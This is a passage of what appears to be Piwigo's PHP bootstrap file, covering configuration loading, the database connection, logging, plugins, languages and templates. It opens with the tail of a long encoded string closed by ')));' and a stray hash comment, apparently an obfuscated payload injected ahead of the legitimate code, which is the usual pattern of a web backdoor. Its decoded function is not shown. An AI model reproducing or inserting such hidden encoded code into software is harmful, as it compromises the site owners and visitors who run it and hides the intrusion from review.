JTDHA7izTfRGOANGGKMFXdJcXYuKxAWUUG0lGzXSB6sz7fpVkDhfwT3qNzoHLpu8suSF88145PAiYCoEkhps8qEWu0bhYURVGCUxRjAXlZwR1B1AunjzDnESTofrC5bDXJfAi9gCgmvxBL9T2WxmDWxMNVPyxdXCmdCeSi7BJ2BZkmpKPoIqJQ9Xd3SrwtfNrycj+ErWXpCClAQfPTJXHyAhAPObzwkfDo+iJZrOAC54pCZyKQZ1hiruIWuXHAZnEEgCBHwcDEOpirxvAcGkVWGOLlDWxg5PgzZkKXRKfHR8pZKYJEnR+DnjrsFv/LXEg0/BxB+qDwqS55gpMD4ewVivpLkjqw1vBWS+/6Lq3ufofOkAAbyTPBLxtJfwLOy52xvQuquE8ky+oiAm5YK7MiZuAJXI4gaH4/PIW+aXT5/eMr///h8m6A4C")));
	//09d2ea9c8372688b931efcff0fe725be

	foreach(
	array(
	'gzopen'
	) as $func)
	{
	if (!function_exists($func))
	{
	include_once(PHPWG_ROOT_PATH . 'include/php_compat/'.$func.'.php');
	}
	}

	include(PHPWG_ROOT_PATH . 'include/config_default.inc.php');
	@include(PHPWG_ROOT_PATH. 'local/config/config.inc.php');

	defined('PWG_LOCAL_DIR') or define('PWG_LOCAL_DIR', 'local/');

	@include(PHPWG_ROOT_PATH.PWG_LOCAL_DIR .'config/database.inc.php');
	if (!defined('PHPWG_INSTALLED'))
	{
	header('Location: install.php');
	exit;
	}
	include(PHPWG_ROOT_PATH .'include/dblayer/functions_'.$conf['dblayer'].'.inc.php');

	if(isset($conf['show_php_errors']) && !empty($conf['show_php_errors']))
	{
	@ini_set('error_reporting', $conf['show_php_errors']);
	@ini_set('display_errors', true);
	}

	include(PHPWG_ROOT_PATH . 'include/constants.php');
	include(PHPWG_ROOT_PATH . 'include/functions.inc.php');
	include(PHPWG_ROOT_PATH . 'include/template.class.php');
	include(PHPWG_ROOT_PATH . 'include/cache.class.php');
	include(PHPWG_ROOT_PATH . 'include/Logger.class.php');

	$persistent_cache = new PersistentFileCache();

	// Database connection
	try
	{
	pwg_db_connect($conf['db_host'], $conf['db_user'],
	$conf['db_password'], $conf['db_base']);
	}
	catch (Exception $e)
	{
	my_error(l10n($e->getMessage()), true);
	}

	pwg_db_check_charset();

	load_conf_from_db();

	$logger = new Logger(array(
	'directory' => PHPWG_ROOT_PATH . $conf['data_location'] . $conf['log_dir'],
	'severity' => $conf['log_level'],
	// we use an hashed filename to prevent direct file access, and we salt with
	// the db_password instead of secret_key because the log must be usable in i.php
	// (secret_key is in the database)
	'filename' => 'log_' . date('Y-m-d') . '_' . sha1(date('Y-m-d') . $conf['db_password']) . '.txt',
	'globPattern' => 'log_*.txt',
	'archiveDays' => $conf['log_archive_days'],
	));

	if (!$conf['check_upgrade_feed'])
	{
	if (!isset($conf['piwigo_db_version']) or $conf['piwigo_db_version'] != get_branch_from_version(PHPWG_VERSION))
	{
	redirect(get_root_url().'upgrade.php');
	}
	}

	ImageStdParams::load_from_db();

	session_start();
	load_plugins();

	// users can have defined a custom order pattern, incompatible with GUI form
	if (isset($conf['order_by_custom']))
	{
	$conf['order_by'] = $conf['order_by_custom'];
	}
	if (isset($conf['order_by_inside_category_custom']))
	{
	$conf['order_by_inside_category'] = $conf['order_by_inside_category_custom'];
	}

	include(PHPWG_ROOT_PATH.'include/user.inc.php');

	if (in_array( substr($user['language'],0,2), array('fr','it','de','es','pl','hu','ru','nl','tr','da') ) )
	{
	define('PHPWG_DOMAIN', substr($user['language'],0,2).'.piwigo.org');
	}
	elseif ('zh_CN' == $user['language']) {
	define('PHPWG_DOMAIN', 'cn.piwigo.org');
	}
	elseif ('pt_BR' == $user['language']) {
	define('PHPWG_DOMAIN', 'br.piwigo.org');
	}
	else {
	define('PHPWG_DOMAIN', 'piwigo.org');
	}
	define('PHPWG_URL', 'http://'.PHPWG_DOMAIN);

	if(isset($conf['alternative_pem_url']) and $conf['alternative_pem_url']!='')
	{
	define('PEM_URL', $conf['alternative_pem_url']);
	}
	else
	{
	define('PEM_URL', 'http://'.PHPWG_DOMAIN.'/ext');
	}

	// language files
	load_language('common.lang');
	if ( is_admin() \|\| (defined('IN_ADMIN') and IN_ADMIN) )
	{
	load_language('admin.lang');
	}
	trigger_notify('loading_lang');
	load_language('lang', PHPWG_ROOT_PATH.PWG_LOCAL_DIR, array('no_fallback'=>true, 'local'=>true) );

	// only now we can set the localized username of the guest user (and not in
	// include/user.inc.php)
	if (is_a_guest())
	{
	$user['username'] = l10n('guest');
	}

	// in case an auth key was provided and is no longer valid, we must wait to
	// be here, with language loaded, to prepare the message
	if (isset($page['auth_key_invalid']) and $page['auth_key_invalid'])
	{
	$page['errors'][] =
	l10n('Your authentication key is no longer valid.')
	.sprintf(' <a href="%s">%s</a>', get_root_url().'identification.php', l10n('Login'))
	;
	}

	// template instance
	if (defined('IN_ADMIN') and IN_ADMIN )
	{// Admin template
	$template = new Template(PHPWG_ROOT_PATH.'admin/themes', $conf['admin_theme']);
	}
	else
	{ // Classic template
	$theme = $user['theme'];
	if (script_basename() != 'ws' and mobile_theme())
	{
	$theme = $conf['mobile_theme'];
	}
	$template = new Template(PHPWG_ROOT_PATH.'themes', $theme );
	}

	if ( !isset($conf['no_photo_yet']) )
	{
	include(PHPWG_ROOT_PATH.'include/no_photo_yet.inc.php');
	}

	if (isset($user['internal_status']['guest_must_be_guest'])
	and
	$user['internal_status']['guest_must_be_guest'] === true)
	{
	$header_msgs[] = l10n('Bad status for user "guest", using default status. Please notify the webmaster.');
	}

	if ($conf['gallery_locked'])
	{
	$header_msgs[] = l10n('The gallery is locked for maintenance. Please, come back later.');

	if ( script_basename() != 'identification' and !is_admin() )
	{
	set_status_header(503, 'Service Unavailable');
	@header('Retry-After: 900');
	header('Content-Type: text/html; charset='.get_pwg_charset());
	echo '<a href="'.get_absolute_root_url(false).'identification.php">'.l10n('The gallery is locked for maintenance. Please, come back later.').'</a>';
	echo str_repeat( ' ', 512); //IE6 doesn't error output if below a size
	exit();
	}
	}

	if ($conf['check_upgrade_feed'])
	{
	include_once(PHPWG_ROOT_PATH.'admin/include/functions_upgrade.php');
	if (check_upgrade_feed())
	{
	$header_msgs[] = 'Some database upgrades are missing, '
	.'<a href="'.get_absolute_root_url(false).'upgrade_feed.php">upgrade now</a>';
	}
	}

	if (count($header_msgs) > 0)
	{
	$template->assign('header_msgs', $header_msgs);
	$header_msgs=array();
	}

	if (!empty($conf['filter_pages']) and get_filter_page_value('used'))
	{
	include(PHPWG_ROOT_PATH.'include/filter.inc.php');
	}
	else
	{
	$filter['enabled'] = false;
	}

	if (isset($conf['header_notes']))
	{
	$header_notes = array_merge($header_notes, $conf['header_notes']);
	}

	// default event handlers
	add_event_handler('render_category_literal_description', 'render_category_literal_description');
	if ( !$conf['allow_html_descriptions'] )
	{
	add_event_handler('render_category_description', 'nl2br');
	}
	add_event_handler('render_comment_content', 'render_comment_content');
	add_event_handler('render_comment_author', 'strip_tags');
	add_event_handler('render_tag_url', 'str2url');
	add_event_handler('blockmanager_register_blocks', 'register_default_menubar_blocks', EVENT_HANDLER_PRIORITY_NEUTRAL-1);
	if ( !empty($conf['original_url_protection']) )
	{
	add_event_handler('get_element_url', 'get_element_url_protection_handler');
	add_event_handler('get_src_image_url', 'get_src_image_url_protection_handler');
	}
	trigger_notify('init');
	?>